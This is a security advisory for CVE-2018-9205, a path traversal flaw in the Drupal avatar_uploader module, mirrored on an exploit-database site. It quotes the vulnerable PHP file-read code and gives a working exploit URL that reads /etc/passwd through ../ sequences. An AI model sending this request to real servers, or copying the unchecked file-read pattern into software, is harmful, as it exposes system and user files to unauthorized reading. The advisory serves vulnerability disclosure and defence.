[ 承認 ] [ 登録 ] [ アカウントの復元 ]
お問い合わせ
次の方法でご連絡することができます:
0day.today  Inj3ct0rエクスプロイト市場とエクスプロイトの危険は,データベースを利用します

Drupal Avatar Uploader 7.x-1.0-beta8 Arbitary File Download Vulnerability

著者
Larry Cashdollar
リスク
[
セキュリティリスクミディアム
]
0day-ID
0day-ID-30220
カテゴリ
web applications
日付の追加
22-04-2018
CVE
CVE-2018-9205
プラットフォーム
php
Title: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8
Author: Larry W. Cashdollar
CVE-ID:[CVE-2018-9205]
Download Site: https://www.drupal.org/project/avatar_uploader
Vendor: https://www.drupal.org/u/robbinzhao
Vendor Notified: 2018-04-02
Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
Advisory: http://www.vapidlabs.com/advisory.php?v=202
Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
Vulnerability:
The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory


<?php

$file = $_GET['file'];

echo file_get_contents("uploadDir/$file");
exit


Exploit Code:
  aC/ http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

#  0day.today [2024-07-02]  #